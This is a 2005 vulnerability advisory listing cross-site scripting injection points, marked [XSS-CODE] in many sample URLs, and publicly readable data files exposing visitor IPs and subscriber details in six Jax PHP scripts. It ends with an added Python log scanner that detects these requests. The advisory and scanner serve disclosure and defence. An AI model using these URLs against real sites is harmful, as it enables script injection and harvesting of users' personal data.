`############################################
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
#############################################
###########
summary:
###########
0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline
###############
0- Description
###############
Jax scripts is a collection of useful PHP scripts to add to or include
in a web site.
Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook
Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a
WWW Petitionbook
Jax Newsletter (GPL)* ==> php script for running online Mailing lists
/ Newsletters
(Mailing List Manager)
Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)
Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)
Jax DWT Editor (GPL)* ==> php script for editing html files based on
Dreamweaver templates
(Template Editor)
###################
1-Products affected
###################
Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.
##################
2- Jax Guestbook
##################
Cross-Site Scripting and information disclosure:
http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
http://[victim]/guestbook/guestbook
// IPs of clients who have signed the guestbook
http://[victim]/guestbook/guestbook_ips2block
//list of ips banned
http://[victim]/guestbook/ips2block
//list of ips banned
http://[victim]/guestbook/formmailer/logfile.csv
// IPs of users who sent messages via the formmail.php script
################
versions
###############
Jax Guestbook v3.1
Jax Guestbook v3.31
###################
3- Jax Petitionbook
###################
Cross-Site Scripting and information disclosure:
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/formmailer.log
// all IPs and messages that users sent via formmail
http://[victim]/petitionbook/ips2block
//all ips banned
http://[victim]/petitionbook/petitionbook
// IPs of all people who have signed the petition
#################
4- Jax Newsletter
#################
Cross-Site Scripting and information disclosure:
http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]
http://[victim]/newsletter/logs/jnl_records
// information disclosure about users: a direct request
to this file reveals:
"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.
############
versions
############
Jax Newsletter v2.14
Jax Newsletter v2.10
#################
5- Jax LinkLists
#################
Cross-Site Scripting and information disclosure:
http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
http://[victim]/linklists/suggestions.csv
// a direct request discloses the IPs of clients who
have suggested a link.
#############
versions
#############
Jax LinkLists v1.1
Jax LinkLists v1.0
#################
6- Jax Calendar
#################
Cross-Site Scripting:
http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]
http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables affected by XSS flaws
##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33
#################
7- Jax DWT Editor
#################
Cross-Site Scripting:
http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]
##############
versions
##############
Jax DWT Editor v1.0
###################
8- Timeline
###################
discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005
#################### End #############################
Thanks to estrella for being my light.
--
Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
`
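
A log-review check for the two issue classes reported above, as an added example that is not part of the advisory or of the Jax scripts. It flags direct requests to the data files listed in sections 2 to 5 and requests to the named scripts whose parameter values do not fit the shapes seen in the advisory's sample URLs; those shapes, the install paths and the log lines are assumptions or constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Data files the advisory lists as readable by direct request.
DATA_FILES = re.compile(
    r"/(guestbook/(guestbook|guestbook_ips2block|ips2block|formmailer/logfile\.csv)"
    r"|petitionbook/(formmailer\.log|ips2block|petitionbook)"
    r"|newsletter/logs/jnl_records|linklists/suggestions\.csv)$")
# Scripts the advisory names as reflecting parameters.
SCRIPTS = re.compile(
    r"/(jax_guestbook|shrimp_petition|jax_newsletter|sign_in|archive|jax_linklists"
    r"|jax_calendar|dwt_editor)\.php$|/calendar/modules/(eventlist|calendar)\.inc\.php$")
# Assumed value shapes, inferred from the sample URLs (not taken from the Jax source).
NUMERIC = {"page", "guestbook_id", "gmt_ofs", "ml_id", "list_id", "cal_id", "Y", "m", "d"}
SHAPES = {"language": r"[A-Za-z]+", "view": r"[dm]\d+", "do": r"\w+",
          "key": r"[0-9a-f]{32}", "mailto": r"[0-9a-f]{32}", "file": r"[0-9a-f]{32}",
          # The calendar itself passes one literal <br> in evt_date, so allow exactly that.
          "evt_date": r"[\d.: -]+(<br>[\d.: -]+)?"}
NO_MARKUP = r"[^<>\"']*"  # fallback for free-text parameters such as evt_title, cur_dir

def classify(target):
    """Classify one request target as 'data-file', 'bad-param', 'ok' or 'ignore'."""
    parts = urlsplit(target)
    if DATA_FILES.search(parts.path):
        return ("data-file", parts.path)
    if not SCRIPTS.search(parts.path):
        return ("ignore", "")
    for name, value in parse_qsl(parts.query, keep_blank_values=True, encoding="latin-1"):
        shape = r"-?\d+" if name in NUMERIC else SHAPES.get(name, NO_MARKUP)
        if not re.fullmatch(shape, value):
            return ("bad-param", name)
    return ("ok", "")

def scan(log_lines):
    """Return (verdict, detail) for every access-log line worth reviewing."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
        if m and (result := classify(m.group(1)))[0] in ("data-file", "bad-param"):
            hits.append(result)
    return hits

SAMPLE_LOG = [  # constructed lines, not real traffic
    '198.51.100.7 - - [05/Aug/2005:10:00:00 +0200] "GET /guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0 HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Aug/2005:10:00:05 +0200] "GET /calendar/jax_calendar.php?Y=2005&m=8&d=2&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=K%F6rper HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Aug/2005:10:01:00 +0200] "GET /newsletter/jax_newsletter.php?language=German%3Cb%3Ex&ml_id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Aug/2005:10:01:30 +0200] "GET /newsletter/logs/jnl_records HTTP/1.1" 200 9000',
]
if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response on a `data-file` hit means the file is served to anyone; denying web access to those files or moving them outside the document root closes that exposure.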